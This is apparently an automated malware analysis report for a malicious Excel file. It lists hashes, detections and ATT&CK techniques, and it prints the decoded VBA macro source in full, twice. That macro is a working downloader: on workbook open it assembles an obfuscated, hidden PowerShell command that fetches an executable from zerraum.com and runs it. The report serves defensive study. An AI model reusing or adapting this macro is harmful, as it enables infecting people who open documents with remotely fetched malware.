Office (OLE) malware analysis — malicious · b4cd2b1460700b51

MALICIOUS

Office (OLE)

50.5 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-18

MD5: 1f54e345b8b2c87aa1f291ff16e95e93 SHA-1: a48645115a682ab4a104d63c612386b037668116 SHA-256: b4cd2b1460700b51f443deb9cabf757ec647c7dda61fd4ba49b1be9b1c4b8855

240 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a Workbook_Open VBA macro that uses obfuscated string concatenation to call cmd.exe with PowerShell. The script then attempts to download a file named 'lenovo<random_number>.exe' from 'http://zerraum.com/mailout' and execute it. This indicates a downloader functionality, likely to fetch and run a secondary payload.

Heuristics 5

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2792 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2792 bytes
SHA-256: `301bca23f657319c856e00128f1ee267a9af2da802a631abd3fd7609f20ccd6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function opoosuumanimal() marmmmma = "e(('My'+'D" opoosuumanimal = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91 ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + marmmmma + "o'+'cu'+'me'+'nts'));(.(\""{1}{" End Function Function hunterdogcat() vuulcanilands = "nT" + ").\""d" + "o`" + "Wn" hunterdogcat = "3}{0}{2}\"" -f'c','Ne" + "w-O" + "bj','t','e') " + sheetunderground + vuulcanilands + "LOaDF`i`lE\"".\""iN`VoKe\""(('ht'+" End Function Function sheetunderground() sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE" End Function Function starsunfire() Dim gardengrass As String Randomize gardengrass = Int(Rnd * 9437006#) starsunfire = gardengrass End Function Function generalaircraft() generalaircraft = "cm" + "d.e" + "Xe /" + "c "" PO" + "weRsH" & bodychampion + ohomutaosaki & opoosuumanimal + hunterdogcat & imagesparagues End Function Function imagesparagues() inextimer = starsunfire holeblackdeep = "'tp:'+'//'+'ze'+'rau'+'m.c'+'om/'+'ma'+'ilo'+'ut'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh" fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE""""" imagesparagues = holeblackdeep + fantaandcola End Function Function ohomutaosaki() ohomutaosaki = "Fil ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv')); d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo = (ge" End Function Function bodychampion() bodychampion = "ElL -noLOGO -NOeXIt -noNI" + "NTERAcTIV -WInDO hiDd" + "en -EXecUt" + "ionP bYpAss -nOpRO" End Function Sub Workbook_Open() Shell generalaircraft, RibbonControlSizeRegular End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 301bca23f657319c856e00128f1ee267a9af2da802a631abd3fd7609f20ccd6e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

































































Function opoosuumanimal()
marmmmma = "e(('My'+'D"
opoosuumanimal = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91  ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + marmmmma + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function
Function hunterdogcat()
vuulcanilands = "nT" + ").\""d" + "o`" + "Wn"
hunterdogcat = "3}{0}{2}\"" -f'c','Ne" + "w-O" + "bj','t','e') " + sheetunderground + vuulcanilands + "LOaDF`i`lE\"".\""iN`VoKe\""(('ht'+"
End Function
Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
Function starsunfire()
Dim gardengrass As String
Randomize
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
Function generalaircraft()
generalaircraft = "cm" + "d.e" + "Xe   /" + "c ""  PO" + "weRsH" & bodychampion + ohomutaosaki & opoosuumanimal + hunterdogcat & imagesparagues
End Function

Function imagesparagues()
inextimer = starsunfire
holeblackdeep = "'tp:'+'//'+'ze'+'rau'+'m.c'+'om/'+'ma'+'ilo'+'ut'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
imagesparagues = holeblackdeep + fantaandcola
End Function
Function ohomutaosaki()
ohomutaosaki = "Fil  ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv'));  d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo =   (ge"
End Function
Function bodychampion()
bodychampion = "ElL -noLOGO  -NOeXIt -noNI" + "NTERAcTIV  -WInDO  hiDd" + "en  -EXecUt" + "ionP  bYpAss  -nOpRO"
End Function
Sub Workbook_Open()
Shell generalaircraft, RibbonControlSizeRegular

End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.